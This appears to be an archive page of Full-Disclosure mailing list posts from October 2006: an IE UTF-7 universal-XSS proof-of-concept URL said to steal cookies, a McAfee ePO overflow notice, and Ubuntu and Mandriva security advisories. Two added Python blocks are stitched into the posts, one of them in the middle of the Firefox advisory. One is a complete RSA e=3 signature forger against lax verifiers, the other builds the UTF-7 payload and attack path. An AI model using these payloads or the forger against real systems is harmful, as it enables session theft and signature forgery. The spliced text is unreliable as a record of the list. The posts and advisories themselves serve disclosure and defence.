[Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])

2006-10-02 Thread Paul Szabo
Eiji James Yoshida wrote in
http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/049784.html
:

 If 'Encoding' is set to 'Auto Select', and Internet Explorer finds a UTF-7
 string in the response's body, it will set the charset encoding to UTF-7
 automatically ...
 Proof of concept:
 http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-...

I know that Apache servers return

  The requested URL /xyz was not found on this server.

when fetching http://apache.svr/xyz . Trouble is that IE shows a custom
error message, ignoring the error body. Pondering, see that

  http://en.wikipedia.org/wiki/HTTP_404

says:

 ... Internet Explorer will not display these pages, however, unless they
 are larger than 512 bytes. ...

This provides UXSS (Universal Cross-Site Scripting):

  http://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...

(with a couple of hundred Zs) will do what we want. Works for https also:

  https://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...

Can steal any Apache server (http or https) cookies. I do not have easy
access to IIS servers to test whether similar attacks would work there.

Will Apache fix (carefully escape) the error message? Will MS fix IE to
not be so over-friendly?

In the meantime, do not use IE to do anything private like banking...

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney, Australia

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] McAfee EPO Buffer Overflow

2006-10-02 Thread muts
###################################################################
#                                                                 #
#   McAfee Epolicy 3.5.0 / Protection Pilot 1.1.0 Buffer Overflow #
#                                                                 #
#   www.remote-exploit.org                                        #
#                                                                 #
#   muts {at} remote-exploit org                                  #
#                                                                 #
###################################################################

[-] Product Information

McAfee® ePolicy Orchestrator® is a security management solution that gives
you a coordinated defense against malicious threats and attacks. As your
central hub, you can keep protection up to date; configure and enforce
protection policies; and monitor security status from one centralized
console.

[-] Vulnerability Description

McAfee® ePolicy Orchestrator® contains a pre-authentication buffer overflow
vulnerability in NAISERV.exe. Protection Pilot 1.1.0 uses the same HTTP
server, and is also vulnerable.

[-] Exploit

Proof of concept exploit code is available at 
http://www.remote-exploit.org/exploits/mcafee_epolicy_source.pm


[-] Exploitation Details

http://www.remote-exploit.org/advisories/mcafee-epo.pdf


[-] Vendor Status

Vendor was notified July 14th, 2006. ehm.


[-] Credits

The vulnerability was discovered by Mati Aharoni (muts) and xbxice.

[-] Shameless Promotion

Get ready for BackTrack v.2.0!



[Full-disclosure] [USN-355-1] openssh vulnerabilities

2006-10-02 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-355-1   October 02, 2006
openssh vulnerabilities
CVE-2006-4924, CVE-2006-5051
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  openssh-server   1:3.9p1-1ubuntu2.3

Ubuntu 5.10:
  openssh-server   1:4.1p1-7ubuntu4.2

Ubuntu 6.06 LTS:
  openssh-server   1:4.2p1-7ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Tavis Ormandy discovered that the SSH daemon did not properly handle
authentication packets with duplicated blocks. By sending specially
crafted packets, a remote attacker could exploit this to cause the ssh
daemon to drain all available CPU resources until the login grace time
expired. (CVE-2006-4924)

Mark Dowd discovered a race condition in the server's signal handling.
A remote attacker could exploit this to crash the server.
(CVE-2006-5051)


Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.3.diff.gz
  Size/MD5:   143243 ee5b491cf023e53b4991fe319da669aa

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.3.dsc
  Size/MD5:  866 237dcc91dde3201ba0bc5b9372654708

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1.orig.tar.gz
  Size/MD5:   832804 530b1dcbfe7a4a4ce4959c0775b85a5a

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_3.9p1-1ubuntu2.3_all.deb
  Size/MD5:31312 a25012353606283dbae09b56dc60f1bb

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.9p1-1ubuntu2.3_amd64.udeb
  Size/MD5:   166846 b0507203d786efa365cef305acc0b790

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.9p1-1ubuntu2.3_amd64.deb
  Size/MD5:   544562 4464ce148432194666a3fd7fae5b884f

http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.9p1-1ubuntu2.3_amd64.udeb
  Size/MD5:   179290 2774b437173889390312fab14a0d9edf

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.9p1-1ubuntu2.3_amd64.deb
  Size/MD5:   279624 deb54b320447ab79b8d8fb351c04960d

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.9p1-1ubuntu2.3_amd64.deb
  Size/MD5:62924 083fd0c899ed8c0c088f6f659d2fd017

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.9p1-1ubuntu2.3_i386.udeb
  Size/MD5:   139452 31deaca18b94b27d52c1870d86810db4

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.9p1-1ubuntu2.3_i386.deb
  Size/MD5:   492810 8df816ca89945adc93e80d49f53aebe6

http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.9p1-1ubuntu2.3_i386.udeb
  Size/MD5:   149160 632d59e71b6a3f5aab50e4cfd3842442

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.9p1-1ubuntu2.3_i386.deb
  Size/MD5:   256218 5f9791afb335d57cd1a830c1e886ee08

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.9p1-1ubuntu2.3_i386.deb
  Size/MD5:62512 9f21ce3a1134980ec47c1e99cf62ff61

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.9p1-1ubuntu2.3_powerpc.udeb
  Size/MD5:   159886 447da8535b3b4c0b85fefd44e01f4c4d

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.9p1-1ubuntu2.3_powerpc.deb
  Size/MD5:   541254 8d16c7e18fef84ab8f6a435c8c988b93

http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.9p1-1ubuntu2.3_powerpc.udeb
  Size/MD5:   163428 e0ca6e79f907c35e2c32e515b8e808dd

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.9p1-1ubuntu2.3_powerpc.deb
  Size/MD5:   273640 c8e00fcbe413ac902ccc4dca508572f2

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.9p1-1ubuntu2.3_powerpc.deb
  Size/MD5:64092 a88a46209fac664959c35b36fb93066e

Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.1p1-7ubuntu4.2.diff.gz
  Size/MD5:   158624 fc0f2620cc3fc07ad4ea050b675e5f1b

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.1p1-7ubuntu4.2.dsc
  Size/MD5:  971 cd61da4d0742c684aaf90b8390252818


Re: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])

2006-10-02 Thread Brian Eaton
On 10/2/06, Paul Szabo [EMAIL PROTECTED] wrote:
 This provides UXSS (Universal Cross-Site Scripting):

   http://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...

 (with a couple of hundred Zs) will do what we want. Works for https also:

   https://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...

 Can steal any Apache server (http or https) cookies. I do not have easy
 access to IIS servers to test whether similar attacks would work there.

 Will Apache fix (carefully escape) the error message? Will MS fix IE to
 not be so over-friendly?

This should only be possible if neither the HTTP headers nor the HTML
page specifies the character set of the document.  If the server
doesn't tell IE the character set, the  autodetection feature will
kick in, and the site is vulnerable.  I just tested Apache 1.3.37 and
Apache 2.2.3, and both specified a content-type header of text/html;
charset=iso-8859-1 for 404 responses, so the attack failed.  My
browser was IE 6.0.2800.1106.

I'm guessing that you tested a server with some kind of customized 404
response that neglected to include a charset specification.  That's
not a vulnerability in Apache, that is poor site configuration.

(I do wish that IE didn't have this character set autodetection
feature, or at least that it was restricted to commonly used character
sets that don't use strange encodings for HTML metacharacters.)

Regards,
Brian



[Full-disclosure] [USN-354-1] Firefox vulnerabilities

2006-10-02 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-354-1   October 02, 2006
firefox vulnerabilities
CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3802,
CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807,
CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811,
CVE-2006-3812, CVE-2006-4253, CVE-2006-4340, CVE-2006-4565,
CVE-2006-4566, CVE-2006-4567, CVE-2006-4568, CVE-2006-4569,
CVE-2006-4571
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  firefox  1.5.dfsg+1.5.0.7-0ubuntu5.10.3
  firefox-dom-inspector1.5.dfsg+1.5.0.7-0ubuntu5.10.3
  firefox-gnome-support1.5.dfsg+1.5.0.7-0ubuntu5.10.3
  devhelp  0.10-1ubuntu2.1
  devhelp-common   0.10-1ubuntu2.1
  epiphany-browser 1.8.2-0ubuntu1.1
  epiphany-browser-dev 1.8.2-0ubuntu1.1
  gnome-app-install0+20051005.1
  libdevhelp-1-0   0.10-1ubuntu2.1
  libdevhelp-1-dev 0.10-1ubuntu2.1
  mozilla-firefox-locale-af-za 1.5-ubuntu5.10-1
  mozilla-firefox-locale-ast-es1.5-ubuntu5.10-1
  mozilla-firefox-locale-bg-bg 1.5-ubuntu5.10-1
  mozilla-firefox-locale-cs-cz 1.5-ubuntu5.10-1
  mozilla-firefox-locale-da-dk 1.5-ubuntu5.10-1
  mozilla-firefox-locale-de1.5-ubuntu5.10-1
  mozilla-firefox-locale-de-de 1.5-ubuntu5.10-1
  mozilla-firefox-locale-en-gb 1.5-ubuntu5.10-1
  mozilla-firefox-locale-es1.5-ubuntu5.10-1
  mozilla-firefox-locale-es-ar 1.5-ubuntu5.10-1
  mozilla-firefox-locale-es-es 1.5-ubuntu5.10-1
  mozilla-firefox-locale-fi-fi 1.5-ubuntu5.10-1
  mozilla-firefox-locale-fr1.5-ubuntu5.10-1
  mozilla-firefox-locale-fr-fr 1.5-ubuntu5.10-1
  mozilla-firefox-locale-ga-ie 1.5-ubuntu5.10-1
  mozilla-firefox-locale-gu-in 1.5-ubuntu5.10-1
  mozilla-firefox-locale-he-il 1.5-ubuntu5.10-1
  mozilla-firefox-locale-hu-hu 1.5-ubuntu5.10-1
  mozilla-firefox-locale-mk-mk 1.5-ubuntu5.10-1
  mozilla-firefox-locale-nl-nl 1.5-ubuntu5.10-1
  mozilla-firefox-locale-pa-in 1.5-ubuntu5.10-1
  mozilla-firefox-locale-pl1.5-ubuntu5.10-1
  mozilla-firefox-locale-pl-pl 1.5-ubuntu5.10-1
  mozilla-firefox-locale-pt-br 1.5-ubuntu5.10-1
  mozilla-firefox-locale-pt-pt 1.5-ubuntu5.10-1
  mozilla-firefox-locale-ro-ro 1.5-ubuntu5.10-1
  mozilla-firefox-locale-ru-ru 1.5-ubuntu5.10-1
  mozilla-firefox-locale-sl-si 1.5-ubuntu5.10-1
  mozilla-firefox-locale-sq-al 1.5-ubuntu5.10-1
  mozilla-firefox-locale-sv1.5-ubuntu5.10-1
  mozilla-firefox-locale-sv-se 1.5-ubuntu5.10-1
  mozilla-firefox-locale-tr-tr 1.5-ubuntu5.10-1
  mozilla-firefox-locale-xh-za 1.5-ubuntu5.10-1
  mozilla-firefox-locale-zh-cn 1.5-ubuntu5.10-1
  mozilla-firefox-locale-zh-tw 1.5-ubuntu5.10-1
  yelp 2.12.1-0ubuntu1.1

After a standard system upgrade you need to restart Firefox to effect
the necessary changes. Since the 1.0.x series of Firefox is not
supported any more, this update introduces the firefox 1.5 series into
Ubuntu 5.10. Please check whether all your extensions still work as
expected.

Details follow:

Various flaws have been reported that allow an attacker to execute
arbitrary code with user privileges by tricking the user into opening
a malicious URL. (CVE-2006-3113, CVE-2006-3677, CVE-2006-3801,
CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807,
CVE-2006-3809, CVE-2006-3811, CVE-2006-3812, CVE-2006-4253,
CVE-2006-4565, CVE-2006-4566, CVE-2006-4568, CVE-2006-4569
CVE-2006-4571)

Cross-site scripting vulnerabilities were found in the
XPCNativeWrapper() function and native DOM method handlers. A
malicious web site could exploit these to modify the contents or steal
confidential data (such as passwords) from other opened web pages.
(CVE-2006-3802, CVE-2006-3810)

A bug was found in the script handler for automatic proxy
configuration. A malicious proxy could send scripts which could
execute arbitrary code with the user's privileges. (CVE-2006-3808)

The NSS library did not sufficiently check the padding of PKCS #1 v1.5
signatures if the exponent of the public key is 3 (which is widely
used for CAs). This could be exploited to forge valid signatures
without the need of the secret key. 
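The last paragraph of the advisory describes the class of forgery Daniel Bleichenbacher described in 2006: if a verifier scans past the 0xFF padding, finds the DigestInfo and hash, and never checks that the hash is the last thing in the block, an attacker can place the hash early, leave the rest of the block as don't-care bytes, and pick a signature whose cube equals such a block (no modular reduction happens, because the cube stays below the modulus). The Python below is an added example written for this page, not NSS code: `verify_lax` reproduces the flawed pattern, not NSS's actual parser, and the key generation, message and helper names are the example's own. It uses SHA-1 and a 1024-bit key, a combination where the forgery works with a single 0xFF byte of padding.

```python
# Added example, not NSS code: how an e = 3 PKCS #1 v1.5 forgery works.
import hashlib
import secrets

E = 3
DIGESTINFO_SHA1 = bytes.fromhex('3021300906052b0e03021a05000414')  # RFC 3447 9.2
SMALL_PRIMES = (3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47)

def is_probable_prime(n: int, rounds: int = 24) -> bool:
    """Trial division plus Miller-Rabin; enough for a demonstration key."""
    if n < 2 or n % 2 == 0:
        return n == 2
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_prime(bits: int) -> int:
    """Top two bits set; p % 3 != 1 keeps e = 3 invertible mod p - 1."""
    while True:
        p = secrets.randbits(bits) | (3 << (bits - 2)) | 1
        if p % 3 != 1 and is_probable_prime(p):
            return p

def gen_key(bits: int = 1024):
    """Return (n, d) for public exponent 3."""
    p, q = gen_prime(bits // 2), gen_prime(bits // 2)
    return p * q, pow(E, -1, (p - 1) * (q - 1))

def key_bytes(n: int) -> int:
    return (n.bit_length() + 7) // 8

def emsa_pkcs1_v15(msg: bytes, k: int) -> bytes:
    """Correct encoding: 00 01 FF..FF 00 DigestInfo || H, exactly k bytes."""
    t = DIGESTINFO_SHA1 + hashlib.sha1(msg).digest()
    return b'\x00\x01' + b'\xff' * (k - len(t) - 3) + b'\x00' + t

def sign(msg: bytes, n: int, d: int) -> int:
    em = emsa_pkcs1_v15(msg, key_bytes(n))
    return pow(int.from_bytes(em, 'big'), d, n)

def verify_strict(msg: bytes, sig: int, n: int) -> bool:
    """The right way: rebuild the expected block and compare all of it."""
    k = key_bytes(n)
    return pow(sig, E, n).to_bytes(k, 'big') == emsa_pkcs1_v15(msg, k)

def verify_lax(msg: bytes, sig: int, n: int) -> bool:
    """The flawed pattern: skip padding, match DigestInfo || H, ignore the rest."""
    k = key_bytes(n)
    em = pow(sig, E, n).to_bytes(k, 'big')
    if em[:2] != b'\x00\x01':
        return False
    i = 2
    while i < k and em[i] == 0xff:
        i += 1
    if i == k or em[i] != 0x00:
        return False
    t = DIGESTINFO_SHA1 + hashlib.sha1(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t     # trailing bytes never examined

def icbrt(x: int) -> int:
    """Largest s with s**3 <= x."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo

def forge(msg: bytes, n: int) -> int:
    """Public key only: minimal padding, the hash, then a don't-care tail."""
    k = key_bytes(n)
    prefix = b'\x00\x01\xff\x00' + DIGESTINFO_SHA1 + hashlib.sha1(msg).digest()
    tail = k - len(prefix)
    low = int.from_bytes(prefix + b'\x00' * tail, 'big')
    high = int.from_bytes(prefix + b'\xff' * tail, 'big')
    s = icbrt(high)      # s**3 < 2**(8*k - 15) < n, so no modular reduction
    if s ** 3 < low:     # consecutive cubes further apart than the tail allows
        raise ValueError('tail too short for this modulus/digest combination')
    return s
```

Calling `forge(msg, n)` needs nothing but the public modulus; `verify_lax` accepts the result and `verify_strict` rejects it, while a genuine `sign(msg, n, d)` passes both. The margin that makes the cube-root trick work: with a 1024-bit modulus and SHA-1 the attacker controls 89 trailing bytes (712 bits of freedom) while consecutive cubes near the 336-bit root are roughly 2^674 apart, so some cube lands inside the controlled range. A longer digest shrinks that margin and a larger modulus widens it, but the actual fix is what `verify_strict` does: compare the whole encoded block instead of parsing it.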

Re: [Full-disclosure] McAfee EPO Buffer Overflow

2006-10-02 Thread virus
Hi,

muts wrote:
 [-] Vendor Status
 
 Vendor was notified July 14th, 2006. ehm.

and more: Advisory published:
http://knowledge.mcafee.com/SupportSite/search.do?cmd=displayKC&docType=kc&externalId=8611438&sliceId=SAL_Public&dialogID=2997768&stateId=0%200%202995803
patch already provided.

GTi



Re: [Full-disclosure] Security Rss Feeds

2006-10-02 Thread Richard Bejtlich
crazy frog crazy frog wrote:

 thanks all for sharing,
 i found around 240+ list of various security related RSS Feeds. Get it here:-
 http://www.secgeeks.infys.net/security_rss_feeds

 _CF

That's an interesting list, especially since it's mine

http://www.bloglines.com/public/TaoSecurity

starting with the 23rd entry for Bloglines and continuing another 200+ entries.

I knew people were republishing my blog with their name on my content.
 I didn't know they were doing the same with my Bloglines choices.

Richard
http://taosecurity.blogspot.com



Re: [Full-disclosure] McAfee EPO Buffer Overflow

2006-10-02 Thread Chris Brown
[-] Vendor Status 

A patch has been posted to the McAfee.com download site.



Re: [Full-disclosure] Security Rss Feeds

2006-10-02 Thread crazy frog crazy frog
Yes, I forgot to mention your name.




-- 
---
http://www.secgeeks.com
---
ting ding ting ding ting ding
ting ding ting ding ding
i m crazy frog :)
oh yeah oh yeah...
 another wannabe, in hackerland!!!



[Full-disclosure] October Chicago 2600/DC312 Meeting Information

2006-10-02 Thread Steven McGrath
BEGIN:VCALENDAR
PRODID:-//Google Inc//Google Calendar 70.9054//EN
VERSION:2.0
CALSCALE:GREGORIAN
METHOD:REQUEST
BEGIN:VEVENT
DTSTART:20061007T00Z
DTEND:20061007T08Z
DTSTAMP:20061002T162110Z
ORGANIZER;CN=Steven McGrath:MAILTO:[EMAIL PROTECTED]
UID:[EMAIL PROTECTED]

Re: [Full-disclosure] McAfee EPO Buffer Overflow

2006-10-02 Thread Debasis Mohanty
An extremely neat work muts !! :)

-d

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of muts
Sent: Sunday, October 01, 2006 6:56 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] McAfee EPO Buffer Overflow



Re: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])

2006-10-02 Thread Paul Schmehl
--On October 2, 2006 9:44:27 AM -0400 Brian Eaton [EMAIL PROTECTED] 
wrote:


I'm guessing that you tested a server with some kind of customized 404
response that neglected to include a charset specification.  That's
not a vulnerability in Apache, that is poor site configuration.

Brian, a question for clarification.  When you say customized 404 
response, you are not referring to a customized error document (as 
described briefly in the httpd.conf file) but rather to having changed the 
headers that the server returns when queried with a GET request, correct? 
And wouldn't this require changing source code and compiling a custom 
build of apache?


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/



Re: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])

2006-10-02 Thread Brian Eaton
On 10/2/06, Paul Schmehl [EMAIL PROTECTED] wrote:
 --On October 2, 2006 9:44:27 AM -0400 Brian Eaton [EMAIL PROTECTED]
 wrote:
 
  I'm guessing that you tested a server with some kind of customized 404
  response that neglected to include a charset specification.  That's
  not a vulnerability in Apache, that is poor site configuration.
 
 Brian, a question for clarification.  When you say customized 404
 response, you are not referring to a customized error document (as
 described briefly in the httpd.conf file) but rather to having changed the
 headers that the server returns when queried with a GET request, correct?
 And wouldn't this require changing source code and compiling a custom
 build of apache?

I am referring to the customized error documents described in the
httpd.conf file.  No recompiling required.

The default Apache response for 404s includes a content-type header
specifying the iso-8859-1 charset.  If you set up an ErrorDocument
handler, though, Apache assumes you know what you are doing and does
not include a charset specification in the content-type header.  You
need to do it yourself.  Including a meta http-equiv tag in the HTML
seems like an obvious fix, but there are other ways as well.

Regards,
Brian

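Paul Szabo's proof of concept and Brian Eaton's analysis together pin down three conditions that must hold at once: the error body reflects the requested URL, the response declares no charset (neither in the Content-Type header nor in a meta tag), and the body is larger than 512 bytes, below which IE shows its own error page instead. As an added example, not code from any poster in this thread, here is a small Python checker that first encodes the payload the way the proof of concept does (only '<' and '>' are shifted into UTF-7 base64 sequences, so the server sees no HTML metacharacters to escape) and then applies the three checks to a raw HTTP response. The two response builders are constructed stand-ins for a stock Apache 404 (charset=iso-8859-1, as Brian observed) and for a site-supplied ErrorDocument that declares no charset; they are not captured Apache output, and the 600-byte run of Zs mirrors the padding in the original URL.

```python
# Added example (not from the thread): does an error response leave IE's
# charset auto-detection free to read a reflected URL as UTF-7?
import base64
import re

# The proof of concept only shifts '<' and '>' into UTF-7; every other
# character stays literal, so the server has nothing to escape.
SHIFTED = set('<>')

def utf7_shift(chars: str) -> str:
    """One '+<modified base64>-' shift sequence: UTF-16BE, base64 without
    '=' padding, '-' terminator (RFC 2152)."""
    b64 = base64.b64encode(chars.encode('utf-16-be')).decode('ascii')
    return '+' + b64.rstrip('=') + '-'

def utf7_encode_payload(text: str, shifted: set = SHIFTED) -> str:
    """Rewrite `text` in the '+ADw-SCRIPT+AD4-' style used in the thread:
    runs of characters in `shifted` become base64 shift sequences."""
    out, run = [], []
    for ch in text:
        if ch in shifted:
            run.append(ch)
            continue
        if run:
            out.append(utf7_shift(''.join(run)))
            run = []
        out.append(ch)
    if run:
        out.append(utf7_shift(''.join(run)))
    return ''.join(out)

def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status, headers, body)."""
    head, _, body = raw.partition(b'\r\n\r\n')
    lines = head.decode('latin-1').split('\r\n')
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

CT_CHARSET = re.compile(r'charset\s*=\s*"?([\w-]+)', re.I)
META_CHARSET = re.compile(rb'<meta[^>]+charset\s*=\s*"?([\w-]+)', re.I)

def utf7_sniff_exposure(raw: bytes, payload: str) -> dict:
    """Apply the three conditions from the thread to one raw response."""
    status, headers, body = parse_response(raw)
    declared = None
    m = CT_CHARSET.search(headers.get('content-type', ''))
    if m:
        declared = m.group(1).lower()
    else:
        m = META_CHARSET.search(body)
        if m:
            declared = m.group(1).decode('latin-1').lower()
    findings = {
        'status': status,
        'declared_charset': declared,
        # under 512 bytes IE replaces the body with its own "friendly" page
        'body_over_512': len(body) > 512,
        'payload_reflected': payload.encode('latin-1') in body,
    }
    findings['exposed'] = (declared is None
                           and findings['body_over_512']
                           and findings['payload_reflected'])
    return findings

PAYLOAD = utf7_encode_payload("<SCRIPT>alert('XSS');</SCRIPT>")
ATTACK_PATH = '/' + PAYLOAD + '/' + 'Z' * 600   # padding pushes the body past 512 bytes

def _response(content_type: str, body: bytes) -> bytes:
    head = (f'HTTP/1.1 404 Not Found\r\nContent-Type: {content_type}\r\n'
            f'Content-Length: {len(body)}\r\n\r\n')
    return head.encode('ascii') + body

def apache_default_404(path: str) -> bytes:
    """Constructed stand-in for the stock Apache 404: charset is declared."""
    body = ('<html><head><title>404 Not Found</title></head><body>'
            f'<h1>Not Found</h1><p>The requested URL {path} was not found '
            'on this server.</p></body></html>\n').encode('latin-1')
    return _response('text/html; charset=iso-8859-1', body)

def custom_errordocument_404(path: str) -> bytes:
    """Constructed stand-in for a site-supplied ErrorDocument that echoes
    the URL but declares no charset anywhere."""
    body = (f'<html><body><h1>Sorry, {path} is not here.</h1>'
            '</body></html>\n').encode('latin-1')
    return _response('text/html', body)

if __name__ == '__main__':
    for name, build in (('stock 404', apache_default_404),
                        ('custom ErrorDocument', custom_errordocument_404)):
        print(name, utf7_sniff_exposure(build(ATTACK_PATH), PAYLOAD))
```

Run as a script it prints the two verdicts: the stock page is not exposed because a charset is declared, the custom ErrorDocument is. To check a real server, capture the raw 404 response (for example with `curl -si`) and pass the bytes to `utf7_sniff_exposure` together with the UTF-7 string exactly as sent in the URL. A meta http-equiv charset in the ErrorDocument, Brian's suggested fix, is picked up by the checker as well; escaping alone does not help here, because the UTF-7 string contains no characters the server would escape.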


[Full-disclosure] [ MDKSA-2006:172-1 ] - Updated openssl packages fix vulnerabilities

2006-10-02 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory   MDKSA-2006:172-1
 http://www.mandriva.com/security/
 ___
 
 Package : openssl
 Date: October 2, 2006
 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0,
   Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 Dr S N Henson of the OpenSSL core team and Open Network Security
 recently developed an ASN1 test suite for NISCC (www.niscc.gov.uk).
 When the test suite was run against OpenSSL two denial of service
 vulnerabilities were discovered.

 During the parsing of certain invalid ASN1 structures an error
 condition is mishandled. This can result in an infinite loop which
 consumes system memory. (CVE-2006-2937)

 Certain types of public key can take disproportionate amounts of time
 to process. This could be used by an attacker in a denial of service
 attack. (CVE-2006-2940)

 Tavis Ormandy and Will Drewry of the Google Security Team discovered a
 buffer overflow in the SSL_get_shared_ciphers utility function, used by
 some applications such as exim and mysql.  An attacker could send a
 list of ciphers that would overrun a buffer. (CVE-2006-3738)

 Tavis Ormandy and Will Drewry of the Google Security Team discovered a
 possible DoS in the sslv2 client code.  Where a client application uses
 OpenSSL to make a SSLv2 connection to a malicious server that server
 could cause the client to crash. (CVE-2006-4343)

 Updated packages are patched to address these issues.

 Update:

 There was an error in the original published patches for CVE-2006-2940.
 New packages have corrected this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 5e48a8d9a6a03a045b6d0d2b6903dc5b  
2006.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm
 f86f3a2efd19ff5fb1600212cbd8e463  
2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm
 73b99c1a8a34fe3c2279c09c4f385804  
2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm
 526fcd69e1a1768c82afd573dc16982f  
2006.0/i586/openssl-0.9.7g-2.5.20060mdk.i586.rpm 
 441a806fc8a50f74f5b4bcfce1fc8f66  
2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 54ed69fc4976d3c0953eeebd3c10471a  
2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mdk.x86_64.rpm
 632fbe5eaff684ec2f27da4bbe93c4f6  
2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mdk.x86_64.rpm
 04dbe52bda3051101db73fabe687bd7e  
2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.x86_64.rpm
 5e48a8d9a6a03a045b6d0d2b6903dc5b  
2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm
 f86f3a2efd19ff5fb1600212cbd8e463  
2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm
 73b99c1a8a34fe3c2279c09c4f385804  
